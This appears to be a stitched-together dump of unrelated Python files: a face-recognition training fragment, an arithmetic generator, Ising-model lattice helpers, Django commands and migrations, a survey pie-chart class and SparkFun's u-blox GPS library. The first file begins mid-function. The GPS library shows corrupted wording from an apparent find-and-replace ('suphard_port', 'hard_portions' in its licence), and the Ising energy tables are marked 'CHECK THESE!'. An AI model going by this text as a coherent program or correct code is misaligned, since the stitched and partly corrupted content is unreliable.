print(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
if phase == 'val' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(modified_resnet.state_dict())
torch.save(best_model_wts, 'mod_resnet.pth')
time_elapsed = time.time() - since
print(f'Training complete in {time_elapsed // 60}m {time_elapsed % 60}s')
print(f'Best val Acc: {best_acc}')
# load best model weights
modified_resnet.load_state_dict(best_model_wts)
return modified_resnet
def recognize(self, face):
predictions = self.model(face.unsqueeze(0).to(self.device))
predictions = predictions.cpu().detach().numpy()[0]
recognized_person = self.facedict[str(np.argmax(predictions))]
return recognized_person, predictions[np.argmax(predictions)]
class Data(Dataset):
def __init__(self, data):
self.data = data
def __len__(self):
return self.data.shape[0]
def __getitem__(self, idx):
image = self.data[idx][0]
label = int(self.data[idx][1])
return torch.tensor(image), torch.tensor(label)
class ModifiedResnet(nn.Module):
def __init__(self, pretrained_model, labels_count):
super(ModifiedResnet, self).__init__()
self.pretrained_model = pretrained_model
self.out_layer = nn.Linear(512, labels_count)
self.softmax = nn.Softmax(dim=1)
def forward(self, x):
x = self.pretrained_model(x)
x = self.out_layer(x)
x = self.softmax(x)
return x
frc = FaceRecognitionClassifier()
try:
frc.get_model()
except:
print('Untrained model weights')
frc.train_classifier(10)
if __name__ == '__main__':
frc.train_classifier(10) |
#!/usr/local/bin/python3
import random
test_count = 63
for _ in range(test_count):
a = str(random.randint(10, 99))
b = str(random.randint(10, 99))
op = '+' if random.randint(0, 1) == 0 else '-'
print(a, op, b)
|
#!/usr/bin/env python
import numpy as np
import os
import ext.progressbar as progressbar
from itertools import permutations
""" misc.py - Place some often reused functions here """
def drawwidget(discription, ljust=20):
""" Formats the progressbar. """
widget = [discription.ljust(ljust), progressbar.Percentage(), ' ',
progressbar.Bar(marker='#', left='[', right=']'), ' ',
progressbar.ETA()]
return widget
def product(iterable):
p = 1
for n in iterable:
p *= n
return p
def get_basename(filepath):
""" If filepath = 'some_path/myfile.hdf5', then this returns 'myfile'. """
basename = os.path.basename(filepath)
name = os.path.splitext(basename)[0]
return name
def acf(ndarr, length=None):
"""
Return an ndarray with normalized correlation coefficients corresponding
with lag elements given by: range(1, length).
The range starts with 1 because the correlation for lag=0 is infinity.
Parameters
----------
ndarr : ndarray of shape (1,)
The signal (typically time-series data) for which the autocorrelation
function C(lag) needs to calculated.
length : int
End of the interval range(1, length). The normalized correlation
coefficients are calculated for this range and returned as an ndarray.
#TODO: or optional array of lag elements [dt1, dt2, dt3,...]
See:
https://en.wikipedia.org/wiki/Pearson_product-moment_correlation_coefficient
for the definition of the correlation matrix.
The correlation coefficients are returned by np.corrcoef. See for details:
http://docs.scipy.org/doc/numpy/reference/generated/numpy.corrcoef.html
"""
if not length:
length = len(ndarr) - 1
coeffs = [np.corrcoef(ndarr[:-dt], ndarr[dt:])[0, 1] \
for dt in range(1, length)]
result = np.array([1]+ coeffs)
return result
def make_energy_map_2D():
"""
This functions returns this dictionary:
{(False, (False, False)): 2,
(False, (False, True)): 0,
(False, (True, False)): 0,
(False, (True, True)): -2,
(True, (False, False)): -2,
(True, (False, True)): 0,
(True, (True, False)): 0,
(True, (True, True)): 2}
"""
energy_map = dict()
#possible below and right neighbors
config1 = (True, True)
config2 = (True, False)
config3 = (False, False)
for perm in set(permutations(config1)):
energy_map.update({(True, perm):2})
energy_map.update({(False, perm):-2})
for perm in set(permutations(config2)):
energy_map.update({(True, perm):0})
energy_map.update({(False, perm):0})
for perm in set(permutations(config3)):
energy_map.update({(True, perm):-2})
energy_map.update({(False, perm):2})
return energy_map
def make_energy_map_3D():
"""
This functions returns this dictionary:
{(False, (False, False, False)): 3,
(False, (False, False, True)): 1,
(False, (False, True, False)): 1,
(False, (True, False, False)): 1,
(False, (True, True, Flase)): -1,
(False, (True, False, True)): -1,
(False, (False, True, True)): -1,
(False, (True, True, True)): -3,
(True, (False, False, False)): -3,
(True, (False, False, True)): -1,
(True, (False, True, False)): -1,
(True, (True, False, False)): -1,
(True, (True, True, Flase)): 1,
(True, (True, False, True)): 1,
(True, (False, True, True)): 1,
(True, (True, True, True)): 3,
"""
energy_map = dict()
#possible below, right and front neighbors
config1 = (True, True, True)
config2 = (True, True, False)
config3 = (True, False, False)
config4 = (False, False, False)
for perm in set(permutations(config1)):
energy_map.update({(True,perm):3})
energy_map.update({(False,perm):-3})
for perm in set(permutations(config2)):
energy_map.update({(True,perm):1})
energy_map.update({(False,perm):-1})
for perm in set(permutations(config3)):
energy_map.update({(True,perm):-1})
energy_map.update({(False,perm):1})
for perm in set(permutations(config4)):
energy_map.update({(True,perm):-3})
energy_map.update({(False,perm):3})
return energy_map
def make_delta_energy_map_2D():
"""
{(False, (False, False, False, False)): 8,
(False, (False, False, False, True)): 4,
(False, (False, False, True, False)): 4,
(False, (False, False, True, True)): 0,
(False, (False, True, False, False)): 4,
(False, (False, True, False, True)): 0,
(False, (False, True, True, False)): 0,
(False, (False, True, True, True)): -4,
(False, (True, False, False, False)): 4,
(False, (True, False, False, True)): 0,
(False, (True, False, True, False)): 0,
(False, (True, False, True, True)): -4,
(False, (True, True, False, False)): 0,
(False, (True, True, False, True)): -4,
(False, (True, True, True, False)): -4,
(False, (True, True, True, True)): -8,
(True, (False, False, False, False)): -8,
(True, (False, False, False, True)): -4,
(True, (False, False, True, False)): -4,
(True, (False, False, True, True)): 0,
(True, (False, True, False, False)): -4,
(True, (False, True, False, True)): 0,
(True, (False, True, True, False)): 0,
(True, (False, True, True, True)): 4,
(True, (True, False, False, False)): -4,
(True, (True, False, False, True)): 0,
(True, (True, False, True, False)): 0,
(True, (True, False, True, True)): 4,
(True, (True, True, False, False)): 0,
(True, (True, True, False, True)): 4,
(True, (True, True, True, False)): 4,
(True, (True, True, True, True)): 8}
"""
delta_energy_map = dict()
#possible neighbors
config1 = (True, True, True, True)
config2 = (True, True, True, False)
config3 = (True, True, False, False)
config4 = (True, False, False, False)
config5 = (False, False, False, False)
#CHECK THESE!
for perm in set(permutations(config1)):
delta_energy_map.update({(True, perm):8})
delta_energy_map.update({(False, perm):-8})
for perm in set(permutations(config2)):
delta_energy_map.update({(True, perm):4})
delta_energy_map.update({(False, perm):-4})
for perm in set(permutations(config3)):
delta_energy_map.update({(True, perm) :0})
delta_energy_map.update({(False, perm) :0})
for perm in set(permutations(config4)):
delta_energy_map.update({(True, perm):-4})
delta_energy_map.update({(False, perm):4})
for perm in set(permutations(config5)):
delta_energy_map.update({(True, perm):-8})
delta_energy_map.update({(False, perm):8})
return delta_energy_map
def make_delta_energy_map_3D():
""" A straightforward addition to the 2D varaiant """
dE_map = dict()
#possible neighbors
config1 = (True, True, True, True, True, True)
config2 = (True, True, True, True, True, False)
config3 = (True, True, True, True, False, False)
config4 = (True, True, True, False, False, False)
config5 = (True, True, False, False, False, False)
config6 = (True, False, False, False, False, False)
config7 = (False, False, False, False, False, False)
#CHECK THESE!
for perm in set(permutations(config1)):
dE_map.update({(True,perm):12})
dE_map.update({(False,perm):-12})
for perm in set(permutations(config2)):
dE_map.update({(True,perm):8})
dE_map.update({(False,perm):-8})
for perm in set(permutations(config3)):
dE_map.update({(True,perm):4})
dE_map.update({(False,perm):-4})
for perm in set(permutations(config4)):
dE_map.update({(True,perm) :0})
dE_map.update({(False,perm) :0})
for perm in set(permutations(config5)):
dE_map.update({(True,perm):-4})
dE_map.update({(False,perm):4})
for perm in set(permutations(config6)):
dE_map.update({(True,perm):-8})
dE_map.update({(False,perm):8})
for perm in set(permutations(config7)):
dE_map.update({(True,perm):-12})
dE_map.update({(False,perm):12})
return dE_map
def probability_table(shape, temperature):
"""
Returns a dictionary representing a probability table.
shape : tuple
temperature : float
"""
dimension = len(shape)
if dimension == 2:
delta_energies = [-8, -4, 0, 4, 8]
elif dimension == 3:
delta_energies = [-12, -8, -4, 0, 4, 8, 12]
else:
message = "No probability table for lattice shape: "
raise ValueError(message + "{}".format(shape))
ptable = dict()
for energy in delta_energies:
ptable.update({energy:np.exp(-energy/temperature)})
return ptable
def neighbor_table(shape):
"""
Returns a dictionary where the keys are the sites and the values
are the neighbors. So for a 4x4 lattice we have:
{0: (1, 15, 4, 12),
1: (2, 0, 5, 13),
2: (3, 1, 6, 14),
3: (4, 2, 7, 15),
4: (5, 3, 8, 0),
5: (6, 4, 9, 1),
6: (7, 5, 10, 2),
7: (8, 6, 11, 3),
8: (9, 7, 12, 4),
9: (10, 8, 13, 5),
10: (11, 9, 14, 6),
11: (12, 10, 15, 7),
12: (13, 11, 0, 8),
13: (14, 12, 1, 9),
14: (15, 13, 2, 10),
15: (0, 14, 3, 11)}
"""
dimension = len(shape)
size = product(shape)
L = shape[0]
nbr_table_helical = dict()
if dimension == 2:
nn_function = nn_helical_bc_2D
elif dimension == 3:
nn_function = nn_helical_bc_3D
else:
raise Exception("Unsupported dimension: {}".format(dimension))
for site in range(size):
nbr_table_helical.update({site:nn_function(site, L)})
return nbr_table_helical
def nn_helical_bc_2D(site, width):
"""
site: int
width: int
Here i,j,k,l are the nearest neighbor indices for an ndarray of
shape (1,) with helical boundary conditions.
So for example, here the neighbors of site=9 are shown:
above
------------|
\|/ |
----------------------------- L ----- R -----------------------------
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
---------------------------------------------------------------------
| /|\
|------------
below
Which you can think of as a 2D lattice that looks like this:
-------------
1 2 3 4 5 6 7 8 9 | 1 | 2 | 3 |
------------------------
4 5 6 7 8 9 | 1 | 2 | 3 | 4 | 5 | 6 |
-------------------------------------
7 8 9 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
------------|------------------------------------
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 1 | 2 | 3 |
------------|------------------------------------
| 4 | 5 | 6 | 7 | 8 | 9 | 1 | 2 | 3 | 4 | 5 | 6 |
------------|------------------------------------
| 7 | 8 | 9 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |
------------|------------------------------------
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 1 2 3
------------|------------------------
| 4 | 5 | 6 | 7 | 8 | 9 | 1 2 3 4 5 6
------------|------------
| 7 | 8 | 9 | 1 2 3 4 5 6 7 8 9
-------------
"""
below = (site+1) % width**2
above = (site-1) % width**2
right = (site+width) % width**2
left = (site-width) % width**2
return below, above, right, left
def nn_helical_bc_3D(site, L):
"""
Same idea as the 2D variant, just now it's some kind of hyperdougnut.
"""
i = (site+1) % L**3
j = (site-1) % L**3
k = (site+L) % L**3
l = (site-L) % L**3
m = (site+L**2) % L**3
n = (site-L**2) % L**3
return i,j,k,l,m,n
def get_delta_energy_function(ising):
dimension = len(ising.shape)
g = ising.grid
if dimension == 2:
nbr_table = neighbor_table(ising.shape)
delta_energy_map = make_delta_energy_map_2D()
def delta_energy(site):
below, above, right, left = nbr_table[site]
key = (bool(g[site]), (bool(g[below]), bool(g[above]), bool(g[right]),
bool(g[left])))
delta_energy = delta_energy_map[key]
return delta_energy
elif dimension == 3:
nbr_table = neighbor_table(ising.shape)
delta_energy_map = make_delta_energy_map_3D()
def delta_energy(site):
below, above, right, left, front, back = nbr_table[site]
key = (bool(g[site]), (bool(g[below]), bool(g[above]), bool(g[right]),
bool(g[left]), bool(g[front]), bool(g[back])) )
delta_energy = delta_energy_map[key]
return delta_energy
else:
raise Exception("Unsupported dimension: {}".format(dimension))
return delta_energy
def get_calc_energy_function(ising):
dimension = len(ising.shape)
g = ising.grid
size = product(ising.shape)
if dimension == 2:
nbr_table = neighbor_table(ising.shape)
energy_map = make_energy_map_2D()
def calc_energy():
""" Returns the total energy """
energy = 0
for site in range(size):
below, above, right, left = nbr_table[site]
key = (bool(g[site]), (bool(g[right]), bool(g[below])))
energy = energy + energy_map[key]
return -energy # H = -J*SUM(nearest neighbors) Let op de -J.
elif dimension == 3:
nbr_table = neighbor_table(ising.shape)
energy_map = make_energy_map_3D()
def calc_energy():
""" Returns the total energy """
energy = 0
for site in range(size):
below, above, right, left, front, back = nbr_table[site]
key = (bool(g[site]),
(bool(g[right]), bool(g[below]), bool(g[front])))
energy = energy + energy_map[key]
return -energy # H = -J*SUM(nearest neighbors) Let op de -J.
else:
raise Exception("Unsupported dimension: {}".format(dimension))
return calc_energy
def print_sim_parameters(ising):
sweeps = ising.sweeps
width = ising.shape[0]
height = ising.shape[1]
lattice_size = width * height
saveinterval_in_iterations = lattice_size * ising.saveinterval
total_iters = sweeps * lattice_size
try:
depth = ising.shape[2]
lattice_size = width * height * depth
total_iters = sweeps * lattice_size
except (IndexError, NameError):
pass
if ising.mode == 'metropolis':
simparams = """
Algorithm : {}
Lattice Shape : {}
Lattice Size : {}
Temperature : {}
Sweeps to perform : {} (1 sweep = {} iterations)
Total Iterations : {} ({} * {} * {})
Saving state every : {} sweeps (every {} iterations)
""".format(ising.mode, ising.shape, lattice_size,
ising.temperature,
sweeps, lattice_size, total_iters, sweeps, width, height,
ising.saveinterval, saveinterval_in_iterations)
elif ising.mode == 'wolff':
simparams = """
Algorithm : {}
Lattice Shape : {}
Lattice Size : {}
Temperature : {}
Cluster flips : {}
Saving state every : {} cluster flips
""".format(ising.mode, ising.shape, lattice_size,
ising.temperature, sweeps, ising.saveinterval)
print(simparams)
#TODO
#3D version
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand, CommandError
from lightning import LightningRpc
from charged.api import Ln
from django.conf import settings
class Command(BaseCommand):
help = 'lightning info'
#def add_arguments(self, parser):
# parser.add_argument('command' , nargs='+', type=str)
def handle(self, *args, **options):
result = Ln().getinfo()
print(result)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='RelatedResource1',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('name', models.CharField(max_length=255)),
('active', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='RelatedResource2',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('name', models.CharField(max_length=255)),
('active', models.BooleanField(default=True)),
('related_resources_1', models.ManyToManyField(to='testproject.RelatedResource1')),
],
),
migrations.CreateModel(
name='TestResource',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('name', models.CharField(max_length=255)),
('related_resource_1', models.ForeignKey(to='testproject.RelatedResource1', on_delete=models.CASCADE)),
('related_resource_2', models.OneToOneField(to='testproject.RelatedResource2', on_delete=models.CASCADE)),
],
),
]
|
# Generated by Django 2.2.19 on 2021-03-19 11:28
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('home', '0003_answers_question'),
]
operations = [
migrations.RenameModel(
old_name='Answers',
new_name='Answer',
),
]
|
my_list_1 = [2,2,5,12,8,2,12]
# создание словаря с колючами из списка
my_dict_1 = dict.fromkeys(set(my_list_1),0)
# подсчёт количества повторов каждого значения в списке с занесением резельтата в значение словаря
for number in my_list_1:
my_dict_1[number] += 1
# финальный список создаём из ключей значение которых равны 1
final_list = []
for number in my_dict_1.keys():
if my_dict_1[number] == 1:
final_list.append(number)
print(final_list) |
import matplotlib.pyplot as plt
import datetime
import json
import os
PIE_COLOR = ['#ff9999', '#99ff99', '#ffcc99']
SURVEY_FIELDS = ['good', 'neutral', 'bad']
class Survey:
def __init__(self, save_path):
"""
:param save_path: Where information should be saved
"""
self.survey_information = {'full_information': list(),
'result': {'good': 0,
'neutral': 0,
'bad': 0}}
self.save_path = save_path
def register_click(self, button):
"""Register a button click"""
if button not in self.survey_information['result']:
print "Bad button call"
return
reg_time = datetime.datetime.now()
reg_time = reg_time.strftime('%d/%m/%Y, %H:%M:%S')
self.survey_information['full_information'].append({'time': reg_time,
'button': button})
self.survey_information['result'][button] += 1
def save_survey(self):
"""Save the survey information data"""
save_str = json.dumps(self.survey_information, indent=2, sort_keys=True)
full_file_name = 'survey_information.txt'
full_save_path = '%s/%s' % (self.save_path, full_file_name)
with open(full_save_path, 'w+') as f:
f.write(save_str)
print 'Saving survey data to: ' + full_save_path
def print_survey(self):
"""Print survey information"""
total_clicks = 0
for field in SURVEY_FIELDS:
total_clicks += self.survey_information['result'][field.lower()]
print 50 * '-'
print 'Survey summary'
for field in SURVEY_FIELDS:
v = self.survey_information['result'][field.lower()]
print '%d people (%.1f%%) thought the event was %s' % (v, 100.0 * v / total_clicks, field)
print 50 * '-'
def plot_pie_chart(self):
"""Plot and save a pie chart of the survey result"""
# Plot data
labels = [label.capitalize() for label in self.survey_information['result'].keys()]
labels = sorted(labels)
sizes = [self.survey_information['result'][label] for label in sorted(self.survey_information['result'].keys())]
# colors red, green and yellow
# Pop out the pie charts
explode = (0.05, 0.05, 0.05)
# Plot pie chart
fig1, ax1 = plt.subplots()
def make_autopct(values):
def my_autopct(pct):
total = sum(values)
val = int(round(pct * total / 100.0))
return '{p:.1f}% ({v:d})'.format(p=pct, v=val)
return my_autopct
_, texts, pct = ax1.pie(sizes, colors=PIE_COLOR, labels=labels, autopct=make_autopct(sizes), startangle=90,
explode=explode, pctdistance=0.7)
# Set sizes of percentage and text
[_.set_fontsize(14) for _ in pct]
[_.set_fontsize(18) for _ in texts]
# draw circle in the middle
centre_circle = plt.Circle((0, 0), 0.5, fc='white')
# plot text in the middle of the circle
plt.text(-0.3, -0.075, "Result", fontsize=24, fontweight='bold')
fig = plt.gcf()
fig.gca().add_artist(centre_circle)
# Equal aspect ratio ensures that pie is drawn as a circle
ax1.axis('equal')
plt.tight_layout()
print "Plot done"
self.save_figure(fig, 'pie_chart.svg')
plt.close('all')
print "Figured saved"
def save_figure(self, fig, fig_name):
"""
Save figure
:param fig: fig object
:param fig_name: file name of the figure
:return:
"""
fig.savefig(os.path.join(self.save_path, 'images', fig_name), format='svg', dpi=1000)
|
# Python library for the SparkFun's line of u-Blox GPS units.
#
# SparkFun GPS-RTK NEO-M8P:
# https://www.sparkfun.com/products/15005
# SparkFun GPS-RTK2 ZED-F9P:
# https://www.sparkfun.com/products/15136
# SparkFun GPS ZOE-M8Q:
# https://www.sparkfun.com/products/15193
# SparkFun GPS SAM-M8Q:
# https://www.sparkfun.com/products/15210
# SparkFun GPS-RTK Dead Reckoning Phat ZED-F9R:
# https://www.sparkfun.com/products/16475
# SparkFun GPS-RTK Dead Reckoning ZED-F9R:
# https://www.sparkfun.com/products/16344
# SparkFun GPS Dead Reckoning NEO-M9N:
# https://www.sparkfun.com/products/15712
#
#------------------------------------------------------------------------
# Written by SparkFun Electronics, July 2020
#
# Do you like this library? Help suphard_port SparkFun. Buy a board!
#==================================================================================
# Copyright (c) 2020 SparkFun Electronics
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial hard_portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#==================================================================================
#
# This is mostly a hard_port of existing Arduino functionaly, so pylint is sad.
# The goal is to keep the public interface pthonic, but internal is internal
#
# pylint: disable=line-too-long, bad-whitespace, invalid-name, too-many-public-methods
#
import struct
import serial
import spidev
import threading
import time
import collections
import sys
import traceback
from . import sfeSpiWrapper
from . import sparkfun_predefines as sp
from . import core
class UbloxGps(object):
"""
UbloxGps
Initialize the library with the given port.
:param hard_port: The port to use to communicate with the module, this
can be a serial or SPI port. If no port is given, then the library
assumes serial at a 38400 baud rate.
:return: The UbloxGps object.
:rtype: Object
"""
MAX_NMEA_LINES = 50
MAX_ERRORS = 5
def __init__(self, hard_port = None):
if hard_port is None:
self.hard_port = serial.Serial("/dev/serial0/", 38400, timeout=1)
elif type(hard_port) == spidev.SpiDev:
sfeSpi = sfeSpiWrapper(hard_port)
self.hard_port = sfeSpi
else:
self.hard_port = hard_port
self.nmea_line_buffer = collections.deque(maxlen=UbloxGps.MAX_NMEA_LINES)
self.worker_exception_buffer = collections.deque(maxlen=UbloxGps.MAX_ERRORS)
self.pckt_scl = {
'lon' : (10**-7),
'lat' : (10**-7),
'headMot' : (10**-5),
'headAcc' : (10**-5),
'pDOP' : 0.01,
'gDOP' : 0.01,
'tDOP' : 0.01,
'vDOP' : 0.01,
'hDOP' : 0.01,
'nDOP' : 0.01,
'eDOP' : 0.01,
'headVeh' : (10**-5),
'magDec' : (10**-2),
'magAcc' : (10**-2),
'lonHp' : (10**-9),
'latHp' : (10**-9),
'heightHp' : 0.1,
'hMSLHp' : 0.1,
'hAcc' : 0.1,
'vAcc' : 0.1,
'errEllipseOrient': (10**-2),
'ecefX' : 0.1,
'ecefY' : 0.1,
'ecefZ' : 0.1,
'pAcc' : 0.1,
'prRes' : 0.1,
'cAcc' : (10**-5),
'heading' : (10**-5),
'relPosHeading' : (10**-5),
'relPosHPN' : 0.1,
'relPosHPE' : 0.1,
'relPosHPD' : 0.1,
'relPosHPLength' : 0.1,
'accN' : 0.1,
'accE' : 0.1,
'accD' : 0.1,
'accLength' : 0.1,
'accPitch' : (10**-5),
'accHeading' : (10**-5),
'roll' : (10**-5),
'pitch' : (10**-5),
}
#packet storage
self.packets = {}
# Class message values
self.cls_ms = {}
#class message list for auto-update
self.cls_ms_auto = {}
tmp_all_cls = []
for (k,v) in vars(sp).items():
if isinstance(v, core.Cls):
tmp_all_cls.append(v);
self.packets[v.name] = {}
self.cls_ms_auto[v.name] = []
self.cls_ms[v.name] = (v.id_, {})
for (mk, mv) in v._messages.items():
self.cls_ms[v.name][1][mv.name] = mk
self.parse_tool = core.Parser(tmp_all_cls)
self.stopping = False
self.thread = threading.Thread(target=self.run_packet_reader, args=())
self.thread.daemon = True
self.thread.start()
def set_packet(self, cls_name, msg_name, payload):
if (payload is None):
if msg_name in self.packets[cls_name]:
del self.packets[cls_name][msg_name]
else:
self.packets[cls_name][msg_name] = payload
def wait_packet(self, cls_name, msg_name, wait_time):
if wait_time < 0 or wait_time is None:
wait_time = 0
orig_tm = time.monotonic()
while (not(msg_name in self.packets[cls_name])):
time.sleep(0.05)
if ((time.monotonic() - orig_tm) >= wait_time / 1000.0 ):
break
return self.packets[cls_name][msg_name] if msg_name in self.packets[cls_name] else None
def run_packet_reader(self):
c2 = bytes()
while True:
try:
if (self.stopping):
break
c2 = c2 + self.hard_port.read(1)
c2 = c2[-len(core.Parser.PREFIX):] # keep just 2 bytes, dump the rest
if (c2[-1:] == b'$'):
nmea_data = core.Parser._read_until(self.hard_port, b'\x0d\x0a')
try:
self.nmea_line_buffer.append('$' + nmea_data.decode('utf-8').rstrip(' \r\n'))
except:
pass #we just ignore bad messages, we don't ignore communication issues though
c2 = b''
elif (c2 == core.Parser.PREFIX):
cls_name, msg_name, payload = self.parse_tool.receive_from(self.hard_port, True, True)
if not(cls_name is None or msg_name is None or payload is None):
#print(cls_name, msg_name)
self.set_packet(cls_name, msg_name, payload)
if (self.stopping):
break
time.sleep(0.01)
except: # catch *all* exceptions
self.worker_exception_buffer.append(sys.exc_info())
if (self.stopping):
break
def stop(self):
self.stopping = True
self.thread.join()
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.stop()
def send_message(self, cls_name, msg_name, ubx_payload = None):
"""
Sends a ublox message to the ublox module.
:param cls_name: The ublox class with which to send or receive the
message to/from.
:param msg_name: The message name under the ublox class with which
to send or receive the message to/from.
:param ubx_payload: The payload to send to the class/id specified. If
none is given than a "poll request" is
initiated.
:return: True on completion
:rtype: boolean
"""
ubx_class_id = self.cls_ms[cls_name][0] #convert names to ids
ubx_id = self.cls_ms[cls_name][1][msg_name]
SYNC_CHAR1 = 0xB5
SYNC_CHAR2 = 0x62
if ubx_payload == b'\x00':
ubx_payload = None
if ubx_payload is None:
payload_length = 0
elif isinstance(ubx_payload, list):
ubx_payload = bytes(ubx_payload)
payload_length = len(ubx_payload)
elif not(isinstance(ubx_payload, bytes)):
ubx_payload = bytes([ubx_payload])
payload_length = len(ubx_payload)
else:
payload_length = len(ubx_payload)
message = bytes((SYNC_CHAR1, SYNC_CHAR2,
ubx_class_id, ubx_id, (payload_length & 0xFF),
(payload_length >> 8)))
if payload_length > 0:
message = message + ubx_payload
checksum = core.Parser._generate_fletcher_checksum(message[2:])
self.hard_port.write(message + checksum)
return True
def request_standard_packet(self, cls_name, msg_name, ubx_payload = None, wait_time = 2500, rethrow_thread_exception = True):
"""
Sends a poll request for the ubx_class_id class with the ubx_id Message ID and
parses ublox messages for the response. The payload is extracted from
the response which is then scaled and passed to the user.
:return: The payload of the ubx_class_id Class and ubx_id Message ID
:rtype: namedtuple
"""
if ubx_payload == b'\x00':
ubx_payload = None
if not(msg_name in self.cls_ms_auto[cls_name] and ubx_payload is None):
self.set_packet(cls_name, msg_name, None)
self.send_message(cls_name, msg_name, ubx_payload)
orig_packet = self.wait_packet(cls_name, msg_name, wait_time);
if len(self.worker_exception_buffer) > 0:
err = self.worker_exception_buffer.popleft()
raise err[1].with_traceback(err[2])
return self.scale_packet(orig_packet) if not(orig_packet is None) else None
def scale_packet(self, packet):
dict_packet = packet._asdict()
isdirty = False
for (k,v) in dict_packet.items():
if k in self.pckt_scl:
isdirty = True
dict_packet[k] = self.pckt_scl[k] * v
return type(packet)(**dict_packet) if isdirty else packet #we only need to reallocate and rebuild packet if it was changed
def stream_nmea(self, wait_for_nmea = True):
while wait_for_nmea and len(self.nmea_line_buffer) == 0:
time.sleep(0.05)
return self.nmea_line_buffer.popleft() if len(self.nmea_line_buffer) > 0 else None
def ubx_get_val(self, key_id, layer = 0, wait_time = 2500):
"""
This function takes the given key id and breakes it into individual bytes
which are then cocantenated together. This payload is then sent along
with the CFG Class and VALGET Message ID to send_message(). Ublox
Messages are then parsed for the requested values or a NAK signifying a
problem.
:return: The requested payload or a NAK on failure.
:rtype: namedtuple
"""
# layer 0 (RAM) and layer 7 (Default)! are the only options
if layer != 7:
layer = 0
payloadCfg = [0,layer,0,0,
(key_id) & 255,
(key_id >> 8) & 255,
(key_id >> 16) & 255,
(key_id >> 24) & 255
]
return self.request_standard_packet('CFG', 'VALGET', bytes(payloadCfg), wait_time = wait_time) #we return result immediately, hope get_val request won't overlap
def ubx_set_val(self, key_id, ubx_payload, layer = 7, wait_time = 2500):
"""
This function takes the given key id and breakes it into individual bytes
which are then cocantenated together. This payload is then sent along
with the CFG Class and VALSET Message ID to send_message(). Ublox
Messages are then parsed for the requested values or a NAK signifying a
problem.
:return: None
:rtype: namedtuple
"""
if ubx_payload is None:
return
elif isinstance(ubx_payload, list):
ubx_payload = bytes(ubx_payload)
elif not(isinstance(ubx_payload, bytes)):
ubx_payload = bytes([ubx_payload])
if len(ubx_payload) == 0:
return
payloadCfg = [0,layer,0,0,
(key_id) & 255,
(key_id >> 8) & 255,
(key_id >> 16) & 255,
(key_id >> 24) & 255
]
self.request_standard_packet('CFG', 'VALSET', bytes(payloadCfg) + ubx_payload, wait_time = wait_time)
def set_auto_msg(self, cls_name, msg_name, freq, wait_time = 2500):
ubx_class_id = self.cls_ms[cls_name][0] #convert names to ids
ubx_id = self.cls_ms[cls_name][1][msg_name]
if freq is None:
freq = 0
elif isinstance(freq, bool):
freq = 1 if freq else 0
elif freq < 0:
freq = 0
if msg_name in self.cls_ms_auto[cls_name]:
self.cls_ms_auto[cls_name].remove(msg_name)
if freq > 0:
self.cls_ms_auto[cls_name].append(msg_name)
payloadCfg = [ubx_class_id, ubx_id, freq]
self.request_standard_packet('CFG', 'MSG', payloadCfg, wait_time = wait_time)
def geo_coords(self, wait_time = 2500):
return self.request_standard_packet('NAV', 'PVT', wait_time = wait_time)
def hp_geo_coords(self, wait_time = 2500):
return self.request_standard_packet('NAV', 'HPPOSLLH', wait_time = wait_time)
def date_time(self, wait_time = 2500):
return self.request_standard_packet('NAV', 'PVT', wait_time = wait_time)
def satellites(self, wait_time = 2500):
return self.request_standard_packet('NAV', 'SAT', wait_time = wait_time)
def veh_attitude(self, wait_time = 2500):
return self.request_standard_packet('NAV', 'ATT', wait_time = wait_time)
def imu_alignment(self, wait_time = 2500):
return self.request_standard_packet('ESF', 'ALG', wait_time = wait_time)
def vehicle_dynamics(self, wait_time = 2500):
return self.request_standard_packet('ESF', 'INS', wait_time = wait_time)
def esf_measures(self, wait_time = 2500):
return self.request_standard_packet('ESF', 'MEAS', wait_time = wait_time)
def esf_raw_measures(self, wait_time = 2500):
return self.request_standard_packet('ESF', 'RAW', wait_time = wait_time)
def reset_imu_align(self, wait_time = 2500):
return self.request_standard_packet('ESF', 'RESETALG', wait_time = wait_time)
def esf_status(self, wait_time = 2500):
return self.request_standard_packet('ESF', 'STATUS', wait_time = wait_time)
def port_settings(self, wait_time = 2500):
return self.request_standard_packet('MON', 'COMMS', wait_time = wait_time)
def module_gnss_support(self, wait_time = 2500):
return self.request_standard_packet('MON', 'GNSS', wait_time = wait_time)
